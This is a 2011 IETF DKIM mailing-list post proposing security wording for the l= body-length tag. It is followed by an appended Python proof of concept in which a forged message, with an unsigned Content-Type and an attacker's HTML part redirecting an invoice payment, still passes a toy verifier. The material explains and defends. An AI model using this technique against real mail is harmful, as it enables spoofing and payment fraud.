ietf-dkim

Re: [ietf-dkim] Ticket 23 -- l= and Content-type

2011-05-01 01:46:33
I'd like to leave in MIME and HTML exploits as examples if people agree that 
wouldn't be harmful, such as this updated text in 4.4.5:

                     <t>INFORMATIVE IMPLEMENTATION NOTE: Using body length
                        limits enables an attack in which an attacker modifies a
                        message to include content that solely benefits the
                        attacker. It is possible for the appended content to
                        completely replace the original content in the end
                        recipient's eyes, such as via alterations to the MIME
                        structure or exploiting lax HTML parsing in the MUA,
                        and to defeat duplicate message detection algorithms.
                        To avoid this attack, signers should be wary of using
                        this tag, and verifiers might wish to ignore the tag,
                        {DKIM 2} perhaps based on other criteria.</t>

I'm worried that without this, a neophyte won't see what the attack is.

I'm fine with the proposed simplification of 9.1, and I think at least Dave and 
JD have +1'd it already as well.

Is that acceptable?

_______________________________________________
NOTE WELL: This list operates according to 
http://mipassoc.org/dkim/ietf-list-rules.html
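Added example, not part of the above message, the DKIM draft, or any DKIM implementation: a toy signer/verifier whose body hash honours l=, used to show the attack the proposed 4.4.5 note describes. The attacker keeps the signed body prefix, appends a new MIME part, and rewrites the Content-Type header (assumed here to be absent from h=) to a multipart type whose boundary first appears in the appended data, so the original text becomes MIME preamble that a MUA does not display. Everything below is constructed: the addresses and message text, the a=hmac-sha256 algorithm tag and the shared key (a stand-in for the RSA private key and the DNS-published public key), and the helper names.

```python
import base64
import email
import hashlib
import hmac
from email import policy

CRLF = b"\r\n"
# Constructed stand-in for the signer's RSA key and the verifier's DNS-published key.
SHARED_KEY = b"constructed-key-not-real-dkim-material"

# Constructed message: a single-part text/plain body, no MIME boundary.
ORIGINAL = (b"From: alice@example.com" + CRLF
            + b"To: bob@example.com" + CRLF
            + b"Subject: Invoice" + CRLF
            + b"Content-Type: text/plain; charset=us-ascii" + CRLF
            + CRLF
            + b"Please pay invoice 42 to account 1234." + CRLF)
EVIL_HTML = b"<p>Pay invoice 42 to account 9999 instead.</p>"

def split_message(raw):
    """Return ([(lowercased name, raw header line)], body) for an unfolded message."""
    head, _, body = raw.partition(CRLF + CRLF)
    return [(line.partition(b":")[0].strip().lower(), line) for line in head.split(CRLF)], body

def canon_body_simple(body):
    """RFC 6376 'simple' body canonicalization: drop trailing empty lines, end with CRLF."""
    while body.endswith(CRLF + CRLF):
        body = body[:-2]
    return body if body.endswith(CRLF) else body + CRLF

def body_hash(body, length=None):
    """bh= value; when l= is present only the first `length` canonicalized bytes are hashed."""
    canon = canon_body_simple(body)
    if length is not None:
        canon = canon[:length]
    return base64.b64encode(hashlib.sha256(canon).digest()).decode()

def header_data(headers, signed_names, sig_line_without_b):
    """'simple' header canonicalization: the raw lines named in h=, then the signature header with b= empty."""
    out = b""
    for name in signed_names:
        out += b"".join(line + CRLF for hname, line in headers if hname == name.encode())
    return out + sig_line_without_b

def sign(raw, signed_names, use_length):
    """Prepend a DKIM-Signature-style header; HMAC stands in for the RSA signature."""
    headers, body = split_message(raw)
    tags = (f"v=1; a=hmac-sha256; c=simple/simple; d=example.com; s=sel; "
            f"h={':'.join(signed_names)}; bh={body_hash(body)}; ")
    if use_length:
        tags += f"l={len(canon_body_simple(body))}; "
    sig_line = b"DKIM-Signature: " + tags.encode() + b"b="
    mac = hmac.new(SHARED_KEY, header_data(headers, signed_names, sig_line), hashlib.sha256).digest()
    return sig_line + base64.b64encode(mac) + CRLF + raw

def parse_tags(value):
    tags = {}
    for item in value.split(";"):
        key, _, val = item.strip().partition("=")
        if key:
            tags[key] = val
    return tags

def verify(raw):
    """Verifier that honours l=: only the first l bytes of the canonical body are checked."""
    headers, body = split_message(raw)
    sig_line = next(line for name, line in headers if name == b"dkim-signature")
    tags = parse_tags(sig_line.partition(b":")[2].decode())
    length = int(tags["l"]) if "l" in tags else None
    if body_hash(body, length) != tags["bh"]:
        return False
    sig_without_b = sig_line[: sig_line.rindex(b"; b=") + 4]   # b= is the last tag we emit
    expected = hmac.new(SHARED_KEY, header_data(headers, tags["h"].split(":"), sig_without_b),
                        hashlib.sha256).digest()
    return hmac.compare_digest(base64.b64encode(expected), tags["b"].encode())

def append_attack(signed, evil_html):
    """Keep the signed prefix, append a part, and re-type the (unsigned) Content-Type so the
    original body becomes MIME preamble, which MUAs do not display."""
    headers, body = split_message(signed)
    new_head = CRLF.join(
        b'Content-Type: multipart/mixed; boundary="evil"' if name == b"content-type" else line
        for name, line in headers)
    new_body = (body + CRLF + b"--evil" + CRLF + b"Content-Type: text/html" + CRLF + CRLF
                + evil_html + CRLF + b"--evil--" + CRLF)
    return new_head + CRLF + CRLF + new_body

def render(raw):
    """What a typical MUA shows: the preferred text part; multipart preamble is ignored."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return msg.get_body(preferencelist=("html", "plain")).get_content().strip()

def hidden_preamble(raw):
    """Text before the first MIME boundary; RFC 2046 says to ignore it, so MUAs hide it."""
    return email.message_from_bytes(raw, policy=policy.default).preamble or ""

if __name__ == "__main__":
    signed = sign(ORIGINAL, ["from", "to", "subject"], use_length=True)
    forged = append_attack(signed, EVIL_HTML)
    print("forged message still verifies:", verify(forged))
    print("recipient sees:", render(forged))
    print("signed text, now hidden as preamble:", hidden_preamble(forged).strip())
```

Two things stop the same append from verifying: signing without l= (the appended bytes change bh=), or keeping l= but listing Content-Type in h= (the rewritten header breaks the header hash), which is why the ticket ties l= to Content-Type. If Content-Type is signed and the original is text/plain, the appended bytes merely show up after the signed text; the lax-HTML variant mentioned in the note, where markup in the appended part swallows or restyles the signed prefix, is not modelled here.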